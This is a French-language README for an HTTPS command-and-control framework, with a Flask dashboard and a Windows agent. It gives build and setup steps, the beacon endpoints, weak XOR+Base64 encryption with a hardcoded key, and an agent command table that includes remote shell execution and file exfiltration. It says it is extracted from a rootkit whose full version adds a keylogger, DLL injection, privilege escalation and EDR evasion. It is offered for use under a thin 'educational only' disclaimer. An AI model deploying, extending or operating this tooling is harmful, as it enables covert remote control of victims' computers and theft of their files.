
Framework C&C HTTPS avec des beacons chiffrés, un tableau de bord web et un agent Windows.

Infrastructure de Commande et Contrôle HTTPS avec tableau de bord web pour la gestion à distance d'agents Windows.
⚠️ Utilisation éducative uniquement - Toute utilisation illégale relève de votre responsabilité.
Serveur :
cd server
pip install flask
python c2_server.py
Accédez au tableau de bord : https://localhost:8443
Client :
build.bat
Modifiez client/c2_client.cpp pour définir l'IP de votre serveur :
wstring c2ServerUrl = L"https://YOUR_SERVER_IP:8443";
Chiffrement : XOR + Base64
Clé : Hostname + Username + "SecretKey2025"
Transport : HTTPS (port 8443)
Agent → POST /api/checkin → Serveur (recevoir commandes)
Agent → POST /api/result → Serveur (envoyer résultats)
Serveur : Python 3.9+, Flask
Client : MinGW-w64 GCC 15.2+, Windows SDK, C++17
Ce framework C2 est extrait du projet XvX Usermode Rootkit. La version complète du rootkit comprend un C2 plus complet avec plus de 15 commandes, incluant le masquage de processus/fichiers/registre, l'élévation de privilèges SYSTEM, des shells inversés interactifs, une fonctionnalité de keylogger, l'injection de DLL et des techniques d'évasion EDR. Cette version autonome fournit l'infrastructure C2 de base à des fins éducatives et pour une intégration aisée dans des projets personnalisés.
Auteur : 28zaakypro[@]proton[.]me
| Commande | Syntaxe | Description |
|---|
shell | shell <cmd> | Exécuter une commande shell |
exfil | exfil <chemin> | Exfiltrer un fichier (Base64) |
sleep | sleep <secondes> | Modifier l'intervalle de balise |
ping | ping | Tester la connectivité |
die | die | Arrêter l'agent |